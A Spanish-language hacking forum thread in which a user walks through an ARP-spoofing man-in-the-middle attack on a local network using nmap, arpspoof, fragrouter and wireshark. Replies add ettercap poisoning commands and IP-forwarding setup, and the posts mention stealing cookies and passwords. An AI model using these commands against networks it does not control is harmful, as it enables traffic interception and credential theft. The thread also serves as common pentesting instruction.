Realizando un ataque man in the middle (hombre en el medio) by arthusu

Iniciado por arthusu, Agosto 01, 2012, 04:09:38 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Bueno yo aquí no les voy a explicar que es esto ya que su palabra del titulo lo explica muy bien, digamoslo asi:
Pc victima ----- Pc atacante -----Modem

Entonces la pc atacante captura todo el trafico  xD! Pero para mejor explicación No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ;)

Asi que yo voy a lo que voy xD, a realizar el ataque :P
Primero que nada nos conectamos a la red...


Tenemos que tener los sig... toos:
Backtrack5
Dsniff
Fragrouter
nmap


Para instalar dsniff y fragrouter:
sudo apt-get install dsniff fragrouter

el nmap en su web official y backtrack igual xD!

Vamos a escanear con el nmap  para buscar maquinas que estén activas... para ello usamos:
Nmap –sP 192.168.x.0/24

Donde las x seria dependiendo del modem donde empiezan las ip
Y la mascara que en este caso es 255.255.255.0 es por eso que le pongo 0/24 para escanear toda la red pero si eres de otro país y tienes otra mascara por ejemplo:

255.255.0.0 seria 0/16
255.0.0.0 seria 0/8

Ahora escaneamos...



Ahora con la ip al final .254 -> modem
.68 al final -> es la mia
.66 -> la victima
Ahora... a espoofear la arp de la victima
Sudo arpspoof –i tarjeta_red –t ip_victima ip_router
Quedaría:
Sudo arpspoof –i wlan0 –t 192.168.1.66 192.168.1.254



Para conseguir tu ip y la tarjeta_red pon ifconfig en una linea de comandos


Y para saber si es el modem el mismo nmap lo dice Huawei es una marca de modem ;)

Ahora a con el router:
Fragrouter –B1



Ejecutaremos ahora wireshark para ver el trafico... en una consola: wireshark & para segundo plano xD



Ahí vemos la captura de paquetes con esto podemos robarnos unas cookies, o no se que se les ocurra xD!....
Bueno en este caso como soy chico bueno... vemos que no capturamos nada mas que sabemos que esta mirando un video de youtube como visitante :P



Espero les haya gustado este tuto no soy muy bueno explicando pero se hace lo que se puede xD jeje saludos :p

Pentest - Hacking & Security Services

Contact me: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Buen Aporte sigue así!

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

buen tutorial , pero todo esto lo puedes hacer solo con wireshark cierto? o solamente con todas esas tools?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
buen tutorial , pero todo esto lo puedes hacer solo con wireshark cierto? o solamente con todas esas tools?
No se si con wireshark solamente se pueda hacer eso pero si quieres hacerlo con una sola tool utiliza ettercap igual estas que use son en linea de comandos que no pesan mucho xD pero es como prefieras hacerlo este es mi modo de hacerlo asi me gusta xD
Pentest - Hacking & Security Services

Contact me: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

mmmm, interesante, voy a intentar hacerlo con BlackUbuntu




..Saludos ---> :D :D :D

Yeah! vi un ataque muy similar y otro ampliado hace unos 3 meses en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta... la charla fue de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Buen post! gracias!


Buenas tardes,

Interesante manual,estoy haciendo pruebas con mi red,estoy con un pc de mesa usando backtrack5 r3 y al lado tengo un portatil que lo tengo de victima para mis pruebas,pero tengo un problema al usar el comando que pones:

Yo pongo wlan1 porque es mi interface,la ipdevictima pongo la de mi postatil y alfinal la de host la de mi router

arpspoof –i wlan1 –t ipdemiportatil ipdemirouter

me devuelve esto como no lo hubiera puesto bien:

Version: 2.4
Usage: arpspoof [-i interface] [-t target] host



¿Alguna idea?

Gracias de antemano

Marzo 24, 2013, 01:55:05 PM #8 Ultima modificación: Marzo 24, 2013, 01:57:32 PM por 0xPandemic
Para hacer un MITM asegurate que tu IPV4 tiene forwarding de paquetes, de otra manera podrias hacerle un denial of service a la red.
consola:

         

  •   echo 1 > /proc/sys/net/ipv4/ip_forward


para poder hacer sniff a todo el trafico de tu host y puerta de enlace usa lo siguiente:

         

  •    arpspoof -t 192.168.1.1 192.168.1.2 & >/dev/null
  •    arpspoof -t 192.168.1.2 192.168.1.1 & >/dev/null


donde 192.168.1.1 es el HOST (target) y 192.168.1.2 es tu puerta de enlace, prueba y me dices si te funciono, en teoria con lo anterior podras visualizar todo el trafico en ambas direcciones, de el host a puerta de enlace y al reves.

Hola,gracias por responder

al lanza el comando cat /proc/sys/net/ipv4/ip_forward,me devuelve 1 asique creo que está bien

al lanzar arpspoof -t 192.168.1.34 192.168.1.1 & >/dev/null
me devuelve  :

[1] 17707

root@bt:~# arpspoof -t 192.168.1.34 192.168.1.1 & >/dev/nullarpspoof: couldn't arp for host 192.168.1.34

Por que no utilizas mejor ettercap?

ettercap -T -M arp:oneway,remote /ip-victima/ /ip-gateway/

lo que hace es lo siguiente:

-T - inicializa ettercap en modo texto

-M realizara ataque man in the middle

ARP - indica que se utilizara envenenamiento de arp

oneway - indica que sera solo en una direccion

remote - indica al arp que sniffe no solo las conexiones directas sino tambien las remotas, como podria ser el caso de alguna puerta de enlace .


0xPandemic  gracias por ayudarme

Bueno he tenido que meter por medio -i wlan1 para que me reconozca mi interfaz,ahora por consola me sale mil cosas que no puedo leer,supongo que ahora ya puedo lanzar wireshark y podre ver el trafico no solo de mi pc,sino tambien el que va del portatil 1.34 al router 1.1 no?

Agrega la opcion -q a la linea de ettercap para que no te visualice todos los paquetes y prueba con wireshark para ver el trafico si gustas, aunque si lo que quieres son las passwords deberian de salir en la consola de ettercap.


#Si quieres te puedo ayudar por medio del chat , para no extender este tema tanto

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta